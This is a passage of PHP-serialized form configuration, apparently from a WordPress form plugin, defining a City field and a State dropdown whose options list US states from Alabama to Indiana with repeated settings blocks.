m_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:8:\"city_216\";s:11:\"field_label\";s:4:\"City\";s:9:\"field_key\";s:8:\"city_216\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:4:\"city\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:35;}i:7;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"11\";s:5:\"label\";s:5:\"State\";s:9:\"label_pos\";s:5:\"above\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:9:\"list_type\";s:8:\"dropdown\";s:10:\"user_state\";s:1:\"1\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"populate_term\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 